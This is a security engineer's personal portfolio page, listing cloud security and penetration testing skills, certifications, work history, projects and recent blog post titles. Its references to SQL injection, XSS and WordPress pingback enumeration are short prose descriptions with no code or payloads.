Paulo Hennig

Cyber Security Engineer

Cloud Security - AWS / Azure

Automation - Python / Shell Script

Code Review - Java / Javascript / PHP / Python

IaC - Cloudformation / Terraform

Red Team

Pentester

Paulo Hennig

Cyber Security Engineer

Cloud Security - AWS / Azure

Automation - Python / Shell Script

Code Review - Java / Javascript / PHP / Python

IaC - Cloudformation / Terraform

Red Team

Pentester

About Me

Hello! I’m Paulo Hennig.

Cyber Security Professional with a focus across CloudSec and Offensive Security. Feel free to contact/add me @ Linkedin

Expertise
Code Review

Code review of web applications (Java, C#, PHP, Javascript and Python), identifying vulnerabilities, ​​and also providing remediation guidance (e.g., parameterized queries, unpredictable tokens/secrets, user input sanitization, validation over serialization/deserialization of objects) based on a given analysis or finding.

Penetration Testing

Pentest and ethical hacking on different infrastructure services, including web applications and mobile apps. This also includes bug bounty at private programs from Synack

CloudSec

Administration of multi-account cloud environments, including the management of IAM (users, roles, trust relationships, permissions boundaries) with the usage of IaC such as Terraform, implementation of security restrictions related to regions, services and actions over a given organization's hierarchy along with configuration of different security services between AWS (e.g., Config, WAF, Security Hub, GuardDuty) and Azure (e.g., Security Center, Sentinel, Risky Detection, Identity Protection) services, integrating them to SOC tools and processes.

Customer Service

As a former Atlassian Senior Support Engineer, I'm delighted to provide a great customer experience with soft and technical skills.

Unix

Administration of different systems/servers such as Linux, AIX, HP-UX by managing its services (e.g., Web Server, VPN), including hardening.

Certifications
InfoSec
----
  • OSWE
  • OSCP
  • OSWP
  • CRTP
  • SCS-C01 (AWS Security Specialty)
  • AZ-500 (Azure Security Engineer Associate)
  • ISO/IEC 27001 (Exin)
  • DESEC Penetration Tester
IT Certs
----
  • AZ-900
  • CompTIA Linux+
  • LPIC-1
  • Postgres Advanced Server 9.6 (EDB)
  • Novell Certified Linux Administrator (CLA)
  • β€Ž
  • β€Ž
Calendar
Resume
Experience
2020 - Present
Cyber Security Specialist
Agi
2020 - 2020
Cyber Security Analyst
Viewdeck

Assistance in cyber-security incidents (e.g., phishing, spear phishing, DDoS, compromised users, malware, social engineer, credential harvesting), focused on Azure environments, which include the following tools and technologies:

  • Sentinel
  • Microsoft Cloud App Security
  • Azure Advanced Threat Protection
  • O365 environment (data loss prevention, filters, phishing campaigns, safe attachments)
  • Identity Management/Protection
  • Security Center
  • Web Application Firewall
  • Security Scores
  • Playbooks
2019 - Present
Security Researcher
SYNACK Red Team

Bug bounty hunter at private programs

2015 - 2020
Senior Support Engineer
Atlassian

Legendary support for on-premises customers around the world who rely on the Atlassian Suite platform. Besides working on support cases, creating how-to documentation, and assisting our global team upon removing technical roadblocks, my day to day also included:

  • Creation and curation of training according to our needs
  • Go-to person for analyzing pentest reports and security issues brought by our customers
  • Case reviewing support cases, aiming for the development of several abilities (e.g., soft skills, troubleshooting, empathy, sense of urgency) on what we’re looking for as legendary support
  • Coaching engineers when noticing opportunities for improvement such as management of time/backlog
  • Investigation of performance issues, including GC logs, thread dumps, and heap dumps
2013 - 2015
Support Analyst
Service IT

Responsible to manage our customers’ infrastructure, focused on Unix environments (AIX, HP-UX, Linux), and also implementing Nagios as a monitoring solution.

My Skills
InfoSec
  • CloudSec (AWS and Azure)
  • SIEM / SOAR
  • Purple Team (red | blue team)
  • DevSecOps
  • NIST
  • IaC
  • Incident Response
  • SAST
  • Security Operation Center
  • Pentest - Services/Web/Mobile
Languages
  • English
  • Portuguese
  • Spanish
Coding
  • Python
  • Shell Scripting
  • Javascript
  • PHP
  • C#
  • Java
Knowledge
  • Hosting Services
  • Hybrid Environments
  • Customer Service
  • OWASP Top 10
  • Cloud
  • NIST Framework
  • Relational Databases
  • WAF / Firewall
  • Ethical Hacking
Recent Projects
Azure Identity Protection - Log Stream
cyber-security

Azure risk detection events handler, parsing data to a SIEM solution, hence providing awareness of different event types (e.g., leaked credentials, atypical travel, anonymous proxy), allowing security teams to work on them in a timely manner.

Integration established via app role authentication over HashiCorp Vault and Azure App with permissions to Microsoft Graph (IdentityRiskEvent.Read.All and IdentityRiskyUser.Read.All) so that events can be fetched accordingly.

Check it here

 

Google-leak
cyber-security

Awareness to SOC/Blue teams regarding shadow IT projects indexed by Google and sensitive information/files that should not be public available with integration to SIEM solutions via syslog.

Check it here

 

Alerts to Jira Tickets
cyber-security

Rest API integration with Microsoft Cloud App Security, abuseipdb, and Jira, so that cyber security events can be tracked efficiently

Check it here

 

Performance Analyser
log-parsing

Parse of Jira and Tomcat logs, isolating possible bottlenecks for the on-premises environment. Also uses regex to filter for full GCs and slow JQL.

Demo Session

 

CVE-2019-11581
remediation

Documentation and remediation for template injection

CVE-2019-15001
remediation

Remediation upon blocking particular HTTP method

WP Internal Enumeration
red-team

Given the configuration settings of “pingback” within WP, you may enumerate internal services and servers in the same network than the target, assuming the mentioned module is vulnerable.

Check it here

 

 

SQL Injection
red-team

Security Project focused on red team activities to use google dorks (e.g., site:mysite.com), and test error-based SQL injection with GET HTTP requests behind web proxy through Google.

Check it here

Latest Posts
June 24, 2022 XSS through PHP_SELF

As per https://www.php.net/manual/en/reserved.variables.server.php, we can interpret PHP_SELF as: The filename of the currently executing script, relative to the document root….

May 24, 2022 Impact Awareness – bounty submission

Summary Given the fact that your bounty report might change your finding from being “accepted” and even your reward over…

May 16, 2022 CVE-2021-42943

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via…